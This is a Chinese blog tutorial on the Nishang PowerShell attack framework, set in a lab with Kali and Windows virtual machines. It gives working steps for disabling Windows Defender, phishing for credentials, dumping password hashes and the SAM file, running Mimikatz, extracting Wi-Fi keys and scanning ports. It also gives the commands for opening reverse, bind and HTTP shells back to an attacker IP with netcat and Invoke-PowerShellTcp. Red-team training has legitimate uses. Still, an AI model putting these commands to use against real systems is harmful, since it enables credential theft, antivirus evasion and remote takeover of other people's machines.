nishang脚本的使用

"nishang"是红队活动和渗透测试中广泛使用的powershell框架,它提供许多强大的攻击模块和命令,用于各种渗透活动中的各种任务,如远程代码执行,横向移动,后门植入等等。

下载地址:https://github.com/samratashok/nishang 

下载就没什么好说的了,最好使用git下载,压缩包可能会出现问题(反正我压缩包整了好久,没整好),nishang脚本需要powershell3.0以上的版本,win7的powershell版本为2.0,会有很多问题,推荐使用win10。

安装

以管理员身份运行powershell,进入脚本所在的目录

导入模块,但是首先要修改策略组,powershell默认是不允许加载脚本的。

PowerShell执行Get-ExecutionPolicy命令来查看默认的策略组。

PowerShell下执行Set-ExecutionPolicy remotesigned。再次导入,就导入成功了。

我这里已经是remotesigned状态了,接下来直接导入模块,发现报错。发生报错是因为没关闭win10的defender,报毒了。

关闭后重新导入。Import-Module -verbose .\nishang.psm1

上图属于正常现象,我们查询导入的模块信息。Get-Command -Module nishang

常见的脚本使用

信息收集篇

1,check-vm

用来检测机器是否为虚拟机

2,Invoke-CredentialsPhish

这个脚本必需正确的输入登录的用户名和密码,否则无法去掉这个对话框,除非杀进程。

输入正确的密码后,能显示明文密码。

3,get-information

得到计算机的一些信息

4,get-passhashes

获取计算机所有用户的hash值

5,get-passhints

获取计算机密码的提示,这个也是很重要的。

6,copy-vss

复制SAM文件到当前目录

7,Invoke-Mimikatz

神器mimikatz,抓取密码,获取凭据,伪造票据,模拟登录等等。

8,FireBuster 192.168.123.1 22-80 -Verbose

对内网的主机进行探测,我内网148的机器开放着80端口,所以它connected to port 80。

9,Get-WLAN-Keys

获取计算机连接过的wifi密码,由于我是虚拟机,没有连接过wifi,所以无法演示,这个脚本其实就是netsh wlan show profile name=”” key=clear

反弹shell篇

实验环境

攻击机 kali 192.168.161.148

靶机 win10 192.168.161.151

参数介绍

-ipaddress 反向连接需要的ip地址

-reverse 反向连接

-bind 正向连接用到的端口绑定

-port 正反向需要的端口

一,基于TCP协议的反弹shell

(1)正向连接(目标一般在外网,攻击机在内网)

靶机执行

.\Invoke-PowerShellTcp.ps1

Invoke-PowerShellTcp -Bind -Port 8888

攻击机使用nc正向连接靶机

nc -nv 192.168.161.151 8888

(2)反向连接(目标一般在内网,攻击机在外网)

攻击机设置监听nc -lvp 8888

靶机反向连接攻击机

nvoke-PowerShellTcp -Reverse -IPAddress 192.168.161.148 -Port 8888

二,基于udp协议的反弹shell(尽量不用,太慢,太卡)

和tcp协议命令差不多

(1)正向连接

(2)反向连接

三,基于http/https的交互性shell

这里用win10当作攻击机   win7为靶机(192.168.161.146)

在攻击机上执行

Invoke-PoshRatHttp -IPAddress 192.168.161.151 -Port 8888

会生成一段命令,放在win7的cmd中执行,直接上线。

相关推荐

  1. Lua脚本使用

    2024-02-09 21:02:01       38 阅读
  2. 【工具使用】EMACSverilog_mode脚本

    2024-02-09 21:02:01       25 阅读
  3. lua脚本基本语法,以及Redis中简单使用

    2024-02-09 21:02:01       66 阅读
  4. 使用python脚本查询mysqlgtid和主从信息

    2024-02-09 21:02:01       39 阅读

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-02-09 21:02:01       98 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-02-09 21:02:01       106 阅读
  3. 在Django里面运行非项目文件

    2024-02-09 21:02:01       87 阅读
  4. Python语言-面向对象

    2024-02-09 21:02:01       96 阅读

热门阅读

  1. ABC339(A-C)

    2024-02-09 21:02:01       42 阅读
  2. 平台工程是 FinOps 的“黄金路径”

    2024-02-09 21:02:01       46 阅读
  3. 【Redis笔记】使用Redisson实现可重入锁

    2024-02-09 21:02:01       50 阅读
  4. Nginx实现对流量控制模块的配置与应用!

    2024-02-09 21:02:01       49 阅读
  5. 如何利用chatgpt提升工作效率?

    2024-02-09 21:02:01       50 阅读
  6. 双非本科准备秋招(21.1)—— 力扣二叉搜索树

    2024-02-09 21:02:01       49 阅读
  7. LLVM实战之将LLVM bitcode转回为LLVM汇编码

    2024-02-09 21:02:01       38 阅读
  8. 策略模式的代码实践示例

    2024-02-09 21:02:01       44 阅读
  9. C++服务器端开发(2):确定服务器框架

    2024-02-09 21:02:01       42 阅读
  10. 自动驾驶稳步迈向商业化应用

    2024-02-09 21:02:01       48 阅读
  11. 考车经验分享

    2024-02-09 21:02:01       49 阅读
  12. Rust方法自动解引用测试,总结和补充

    2024-02-09 21:02:01       58 阅读